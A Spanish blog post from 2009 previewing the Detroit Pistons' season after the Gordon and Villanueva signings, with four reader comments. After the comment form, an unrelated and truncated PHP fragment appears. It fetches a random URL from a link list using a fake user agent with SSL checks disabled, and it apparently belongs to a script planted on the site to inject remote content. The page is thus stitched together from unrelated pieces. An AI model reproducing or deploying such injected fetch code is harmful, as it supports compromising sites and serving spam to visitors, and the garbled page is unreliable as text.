Detroit Pistons: Y los cambios llegaron

25 de October de 2009 por telekoman

Tras casi 6 años manteniendo un bloque sólido, competitivo la mayoría de las veces, y siempre incomodo para los rivales, Detroit a ¿concluido? el camino que inicio el pasado año con el intercambio Billups-Iverson. El movimiento, claramente destinado a hacer un hueco salarial suficientemente potente para este año, dejó al equipo de Detroit en una temporalmente mala situación deportiva, al tiempo que potenciaba a Denver hasta las finales de la conferencia Oeste. Los 12 millones de dolares liberados por Iverson, junto a la finalizacion de otros contratos como el de Rasheed Wallace han dejado a Joe Dumars con una importante cantidad de dinero para gastar. La duda era clara: ¿Gastar ahora o esperar al año que viene al hipotético fichaje de  Lebron?

La respuesta ha sido contundente, gastar ahora. Y además  por partida doble. Ben Gordon y Charlie Villanueva parecen encajar perfectamente en la filosofía de conjunto de los Pistons. Dos buenos jugadores, alejados quizás de la etiqueta de “grandes estrellas”, capaces de trabajar sin fisuras por el bien del equipo, aportando juventud, acierto y ganas. Queda por ver si las decisiones han sido acertadas.

El frountcout de los Pistons recuerda bastante al del año pasado aunque con muchos matices que lo hacen diferente. Rodney Stuckey, Rip Hamilton y Ben Gordon compartirán los puestos de 1 y 2. Parece haber pocas diferencias respecto al Stuckey-Iverson-Hamilton del año pasado pero la principal será el caracter. La falta de adaptación al rol de reserva de lujo de Iverson durante el año pasado no parece que se vaya a repetir durante este nuevo curso. Stuckey parece indiscutible en el papel de base titular. Debe terminar de ganarse los galones en una liga ultracompetitiva en ese puesto, pero los 13,4 puntos y casi 5 asistencias del año pasado parecen un buen aval. Su reserva natural será Will Bynum, que aprovechó estupendamente los 14 minutos de media de los que disfrutó el año pasado, yéndose incluso a los 12 puntos de media durante los playoffs.

El puesto de 2 está copado por Hamilton y Gordon que se repartirán los minutos, aunque no será raro ver a Gordon de 2 y a Rip de 3. Gordon, un anotador nato, mejorará sustancialmente el tiro de 3 de la franquicia, una de las peores facetas del año pasado. Hamilton por su parte, tras 10 años en la liga, verá rebajados sus minutos inevitablemente.

El 3 titular de estos años anteriores, Tayshaun Prince, continuará siéndolo también este año. Último reducto junto a Hamilton de la gloriosa “Vieja Guardia”, compartirán los minutos dando paso a alguno de lo rookies, Austin Daye y DaJuan Summers, de los que no se espera un impacto inmediato.

El puesto de PF titular será para Villanueva, con la difícil tarea de hacer olvidar a un Rasheed Wallace que caló muy hondo en la afición de Detroit. Su problema fundamental será sin duda la defensa, punto que deberá mejorar si quiere llegar al corazón de los fans. Como suplente tendrá a un Jason Maxiell del que se esperaba algo más.

El puesto más debil será sin duda el de Center. Ben Wallace, Kwame Brown y Chris Wilcox se repartirán los minutos con un papel mucho más importante en defensa que en ataque. Pocos recursos quizás en una posición tan importante y con tanto peso pesado en otros equipos de la conferencia como Boston, Cleveland u Orlando. ¿Esperamos algún movimiento de Joe Dumars para reforzar con gente nueva esta posición? No es descabellaado. En caso de que no lo haga será difícil que pasen de primera ronda cuando todos los equipos empiecen a meter balones dentro.

Equipo titular: Stuckey, Hamilton, Prince, Villanueva y Ben Wallace
6º hombre: Ben Gordon.

Posición: 1ª ronda de playoffs

Comenta

4 comentarios a esta entrada

  1. Dantley2 dice:
    #1

    Tengo mis dudas sobre Villanueva, supongo que será algo de cabeza, pero no lo acabo de ver jugando consistentemente bien pese a que capacidad para hacerlo tendría. Gordon me parece un enorme fichaje, un tipo que es un seguro en +20ppg saliendo del banquillo es un lujazo.

    Stuckey ha hecho muy buena preseason tirando bien que era lo que le fallaba, puede ser su gran año.

    Creo que lo suyo habría sido traspasar a Prince o Hamilton o los dos por un interior potente, pero me temo que el trade llegaría tarde porque ambos han perdido valor.

    Por cierto, en los rookies Jerebko ha adelantado a Summers, ha mostrado cosas interesantes el sueco aunque el crack potencial de futuro es Daye

      Citar

  2. Óscar dice:
    #2

    Estoy de acuerdo con Austin Daye, un jugador muy versátil, con buenos fundamentos, brazos muy largos y que si consolida su tiro de media distancia puede jugar bastantes minutos desde ya, como “backup” en las posiciones 3/4, aunque es más un “cuatro”.
    Estos Pistons son difíciles de evaluar hasta que no se pongan en marcha. No extrañaría ni que se quedasen fuera de Playoffs, ni que luchasen por la 4ª/ 5ª plazas del Este. Como siempre, todo será cuestión de química y que los Gordon o Villanueva rindan desde el principio. El termómetro del equipo puede ser Stuckey. Si explota de verdad puede ayudar a que Detroit vuelva a ser ese equipo sólido que llegó a tantas finales de Conferencia consecutivas… hasta el intercambio Billups/ Iverson de principos de Noviembre de 2008.

      Citar

  3. Txusma dice:
    #3

    Una defensa con Prince y Daye debe ser un autentido dolor de cabeza con todos esos brazos por ahi 😀

      Citar

  4. CAMPO2 dice:
    #4

    yo creo que en defensa interior estoy con vosotros en que van a sufrir de lo lindo porque Wallace no ni la sombra de lo quefue y de kwame brown me fio menos todavia, si a eso le sumamos la alergia que tiene villanueva a la pintura, cualquier equipo con jugador interor agresivo se los merenda por no hablar del dia les pille un howard, Garnett, Duncan. espero que Maxiel de un paso al frente y aporte esa agresividad que falta, la que utiliza para contrarestrar la falta de cm.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>